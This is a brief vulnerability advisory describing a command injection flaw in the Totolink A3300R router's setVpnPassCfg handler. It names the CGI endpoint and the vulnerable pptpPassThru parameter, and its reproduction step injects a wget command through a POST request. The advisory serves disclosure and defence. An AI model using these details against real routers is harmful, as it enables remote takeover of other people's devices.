Totolink A3300R Command Injection Vulnerability in VPN Parameter Handler

A command injection vulnerability has been identified in the Totolink A3300R router, specifically in version 17.0.0cu.557_b20221024. The issue resides in the VPN parameter handler, within the function 'setVpnPassCfg' of the file '/cgi-bin/cstecgi.cgi'. This vulnerability allows remote attackers to execute arbitrary operating system commands by manipulating the 'pptpPassThru' parameter in a crafted request. The exploitation of this vulnerability could lead to a complete compromise of the affected device.

Impact

Exploitation of this vulnerability allows for arbitrary command execution on the affected device, potentially leading to full device compromise.

Reproduction

To reproduce this vulnerability, send a POST request to '/cgi-bin/cstecgi.cgi' with the 'pptpPassThru' parameter set to a command payload, such as a 'wget' command. The router will execute the injected command, as demonstrated in the proof-of-concept exploitation available on GitHub.